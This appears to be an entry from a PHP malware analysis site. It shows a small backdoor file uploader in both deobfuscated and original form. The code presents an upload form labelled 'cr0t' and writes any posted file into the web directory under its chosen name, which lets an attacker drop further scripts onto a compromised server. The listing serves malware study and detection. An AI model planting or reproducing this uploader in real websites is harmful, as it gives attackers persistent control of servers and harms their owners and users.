PHP Malware Analysis

Back to list

Tags

Input
_POST

Deobfuscated code

<?php

if ($_POST) {
    if (@copy($_FILES["0"]["tmp_name"], $_FILES["0"]["name"])) {
        echo "Y";
    } else {
        echo "N";
    }
} else {
    echo "<b></b><form method=post enctype=multipart/form-data><input type=file name=0><input name=0 type=submit value=cr0t>";
}

Original code

<?php if($_POST){if(@copy($_FILES["0"]["tmp_name"],$_FILES["0"]["name"])){echo"Y";}else{echo"N";}}else{echo"<b></b><form method=post enctype=multipart/form-data><input type=file name=0><input name=0 type=submit value=cr0t>";}?>